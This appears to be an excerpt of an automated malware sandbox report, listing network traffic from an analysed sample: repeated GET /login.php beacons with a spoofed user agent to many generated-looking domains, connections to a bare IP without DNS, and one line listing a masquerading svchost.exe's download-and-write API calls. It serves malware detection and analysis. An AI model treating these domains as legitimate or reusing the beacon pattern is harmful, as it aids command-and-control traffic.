Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347463|1731347428|17|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347465|1731347428|10|3|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347465|1731347428|18|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347473|1731347428|13|3|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347473|1731347428|9|4|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347473|1731347428|13|3|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347479|1731347428|7|5|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347479|1731347428|9|4|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347479|1731347428|9|4|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347479|1731347428|7|5|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347479|1731347428|9|4|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347479|1731347428|9|4|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C839C0 memset,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,WriteFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_02C839C0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
